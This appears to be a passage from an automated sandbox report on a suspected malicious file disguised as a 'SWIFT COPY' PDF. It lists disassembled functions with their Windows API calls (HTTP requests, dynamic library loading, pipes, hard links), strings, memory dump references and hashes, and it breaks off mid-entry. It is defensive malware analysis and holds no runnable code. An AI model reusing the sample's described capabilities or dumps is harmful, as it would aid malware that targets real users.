                                                                                    Function 00960213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096027B
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009602B1
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009602C2
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00960344
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 0244c2558bf37107f881818d664bb0972a7f3d055bbeff11c44bb6885de75e1c
                                                                                    • Instruction ID: cd2f617b8c37907f9182d78ffe35f1996fb10eaf7ff93533eb00262f7aed9426
                                                                                    • Opcode Fuzzy Hash: 0244c2558bf37107f881818d664bb0972a7f3d055bbeff11c44bb6885de75e1c
                                                                                    • Instruction Fuzzy Hash: 0A418BB1A04208EFDB15CF54C8C4B9B7BB9EF85311F1484A9E9099F206D7B4DA44CBA0
                                                                                    Function 00965007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00965075
                                                                                    • GetMenuItemInfoW.USER32 ref: 00965091
                                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009650D7
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009E1708,00000000), ref: 00965120
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: 22d8b3ba78b7916a2ba4d1fff6b2e63b44cbadcf3b9006794daed908411894df
                                                                                    • Instruction ID: db4037346efcda71d6c01612f6543bc3517970e4aad98809a24704a195f4749a
                                                                                    • Opcode Fuzzy Hash: 22d8b3ba78b7916a2ba4d1fff6b2e63b44cbadcf3b9006794daed908411894df
                                                                                    • Instruction Fuzzy Hash: E141C2712097019FD720DF24D884F6AB7E8AF8A324F164A1EF99697391D730E904CB62
                                                                                    Function 0096E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0096E742
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0096E768
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0096E78D
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0096E7B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID: p1#v`K$v
                                                                                    • API String ID: 3321077145-1068180069
                                                                                    • Opcode ID: 4924e8f61a33f798fcded5829ddfd6b67626570143c86bbeee88884dcd055224
                                                                                    • Instruction ID: b124a481c14c031677e6c11cf21d25f58f278c2b5b7160a05f33645200b34a80
                                                                                    • Opcode Fuzzy Hash: 4924e8f61a33f798fcded5829ddfd6b67626570143c86bbeee88884dcd055224
                                                                                    • Instruction Fuzzy Hash: B5412439600620DFCF15EF15C484A4DBBE5BF99720F198498E946AB3A2CB34FD01DB95
                                                                                    Function 00980567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00980587
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 2358735015-567219261
                                                                                    • Opcode ID: 8a2cdd4f6a5074cbcc760ddc196d522ac1d3c3fea02568e5cc44818d9c3aed5a
                                                                                    • Instruction ID: d30c85fbc20317b7a421e7098cb6571ae904d13e1b412eae32302fdbdd92f568
                                                                                    • Opcode Fuzzy Hash: 8a2cdd4f6a5074cbcc760ddc196d522ac1d3c3fea02568e5cc44818d9c3aed5a
                                                                                    • Instruction Fuzzy Hash: 2B31C370500216AFCF10EF54DC41AEEB3B8FF95314B108A2AE866A77D1EB71E915CB90
                                                                                    Function 0095B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0095B88E
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0095B8A1
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0095B8D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: cebd6a22d1ce2dfc3515b6221d61898b963813f1de5d4acf952694c13fbb259c
                                                                                    • Instruction ID: 108816570b4e909520ab9856f26486104fb0b75caf51549f74389e3a25aec985
                                                                                    • Opcode Fuzzy Hash: cebd6a22d1ce2dfc3515b6221d61898b963813f1de5d4acf952694c13fbb259c
                                                                                    • Instruction Fuzzy Hash: AB2105B1900108BFDB14EB65D886EFE777CDF95355F104129F922A71E0DB784D0A9B60
                                                                                    Function 009743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00974401
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00974427
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00974457
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0097449E
                                                                                      • Part of subcall function 00975052: GetLastError.KERNEL32(?,?,009743CC,00000000,00000000,00000001), ref: 00975067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 1951874230-3916222277
                                                                                    • Opcode ID: e56c3620aaab1fdf1f663be4f88636f9b5fc6a09e4c694147bf637734d2608fe
                                                                                    • Instruction ID: 63a050c5710e173dcf84266cf18bfc0cce145aedb987d7d62c05a5cc43b90a40
                                                                                    • Opcode Fuzzy Hash: e56c3620aaab1fdf1f663be4f88636f9b5fc6a09e4c694147bf637734d2608fe
                                                                                    • Instruction Fuzzy Hash: 64217CB2604208BEEB119F648C85FBBB6ECEF89758F11C41AF10E92151EB748D05A7B1
                                                                                    Function 009890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0098915C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00989163
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00989178
                                                                                    • DestroyWindow.USER32(?), ref: 00989180
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: dfbd61f1355b6ce7e2e3d4921dc96f4e510cfbc460a75099cee1c8b12bd75576
                                                                                    • Instruction ID: 836ca86882bd528fa7e3c231fa5ebd85caf23bc54a14c6e4d0b48e79ae4ae649
                                                                                    • Opcode Fuzzy Hash: dfbd61f1355b6ce7e2e3d4921dc96f4e510cfbc460a75099cee1c8b12bd75576
                                                                                    • Instruction Fuzzy Hash: 0021A17121C206BBEF106F64DC88FBB37ADEF9A364F180619F915A2290C731DC41A760
                                                                                    Function 00969568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00969588
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009695B9
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 009695CB
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00969605
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 88e01c0c186173f1ba0a7983516b0d4fedb83a594bd1b57dda96bcb4bc7424d7
                                                                                    • Instruction ID: a1e46f32ad2ae2aaaf855e1439736d4eff939486244e30505f375444ba4f3f00
                                                                                    • Opcode Fuzzy Hash: 88e01c0c186173f1ba0a7983516b0d4fedb83a594bd1b57dda96bcb4bc7424d7
                                                                                    • Instruction Fuzzy Hash: 2A216D70600205ABEB219F29DC45A9E7BFCAF85724F204A19FDA2D72E0D770D945DB60
                                                                                    Function 00969634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00969653
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00969683
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00969694
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009696CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 03119b559ba1782c5195065e0c228ec25ef3473f042ae825027378e836b53330
                                                                                    • Instruction ID: 04e00308a97ba4645fbc15b742e98e37a37e111656dcca2303ae546b3facf2dd
                                                                                    • Opcode Fuzzy Hash: 03119b559ba1782c5195065e0c228ec25ef3473f042ae825027378e836b53330
                                                                                    • Instruction Fuzzy Hash: DB217C71600305ABDB209F69DC44F9AB7ECAF85724F200A19FCA1E72E0EB709845DB61
                                                                                    Function 0096DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096DB0A
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0096DB5E
                                                                                    • __swprintf.LIBCMT ref: 0096DB77
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,009BDC00), ref: 0096DBB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: 92bcc42fec1187b8df207de5c30b8431ad2a41811ba95fa4aee92e65ec7edf34
                                                                                    • Instruction ID: 548dc0d04ea26d5083ed710b91989e13c44827018d6a3775c0adc2368a013a76
                                                                                    • Opcode Fuzzy Hash: 92bcc42fec1187b8df207de5c30b8431ad2a41811ba95fa4aee92e65ec7edf34
                                                                                    • Instruction Fuzzy Hash: F1218775A00108AFCB10EF65DD85EEEBBB8EF89704B104069F505DB351DB71EA41DB61
                                                                                    Function 0095C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0095C84A
                                                                                      • Part of subcall function 0095C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0095C85D
                                                                                      • Part of subcall function 0095C82D: GetCurrentThreadId.KERNEL32 ref: 0095C864
                                                                                      • Part of subcall function 0095C82D: AttachThreadInput.USER32(00000000), ref: 0095C86B
                                                                                    • GetFocus.USER32 ref: 0095CA05
                                                                                      • Part of subcall function 0095C876: GetParent.USER32(?), ref: 0095C884
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095CA4E
                                                                                    • EnumChildWindows.USER32(?,0095CAC4), ref: 0095CA76
                                                                                    • __swprintf.LIBCMT ref: 0095CA90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 3187004680-1110647743
                                                                                    • Opcode ID: db6a4a75218ef4d303079b40f9c30c4c9bd095be5dd9fadd949ad94be7d1a26f
                                                                                    • Instruction ID: 7c857f6a9906bc4f8a258d6ecc1ce3a2c99d34ed6d97ae17b164a421ee883b60
                                                                                    • Opcode Fuzzy Hash: db6a4a75218ef4d303079b40f9c30c4c9bd095be5dd9fadd949ad94be7d1a26f
                                                                                    • Instruction Fuzzy Hash: 491181B16003097BCF11FFA19C89FE93B6CAF85715F008066FE19AA186DB749549DB70
                                                                                    Function 00981945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009819F3
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00981A26
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00981B49
                                                                                    • CloseHandle.KERNEL32(?), ref: 00981BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: ea14927d8014ce97d0abd67a409116652b156e3d0a55e74d1109ad073a7b5162
                                                                                    • Instruction ID: d8bd0cbfa3ec679c27348e491a24da902c8b9cb5600cd922cae6a2910f606b72
                                                                                    • Opcode Fuzzy Hash: ea14927d8014ce97d0abd67a409116652b156e3d0a55e74d1109ad073a7b5162
                                                                                    • Instruction Fuzzy Hash: 9A815F70600214ABDF14AF64C886BADBBF9AF48720F148499F905AF396D7B5E941CF90
                                                                                    Function 0098E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0098E1D5
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098E20D
                                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0098E248
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0098E269
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0098E281
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3188977179-0
                                                                                    • Opcode ID: c263000e39f766bf19da847f5285b1b7c01a6d458d11c3d3e8a85252d78d165f
                                                                                    • Instruction ID: e6e7a204747f8fb4ffe71ffdaf63cedfd8bd7cc16312a89c65529c07a13d7a6b
                                                                                    • Opcode Fuzzy Hash: c263000e39f766bf19da847f5285b1b7c01a6d458d11c3d3e8a85252d78d165f
                                                                                    • Instruction Fuzzy Hash: C861A034A08244AFDB25EF58C8A9FAA77FEEF89300F144459F95A973A1C775AD40CB10
                                                                                    Function 00961C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00961CB4
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00961D26
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00961D81
                                                                                    • VariantClear.OLEAUT32(?), ref: 00961DF8
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00961E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 1dea835f3654d8750a86c108b76cc1b2ba11999ac17f2892befde4744f0168a6
                                                                                    • Instruction ID: cb99da6ce3b1f80d872758d5071194699a4c524a83bdd57ea636a632c019ea76
                                                                                    • Opcode Fuzzy Hash: 1dea835f3654d8750a86c108b76cc1b2ba11999ac17f2892befde4744f0168a6
                                                                                    • Instruction Fuzzy Hash: 085148B5A00209EFDB14CF58C890AAAB7F8FF4D314B198559E959DB350E330EA51CFA0
                                                                                    Function 00980688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009806EE
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0098077D
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0098079B
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009807E1
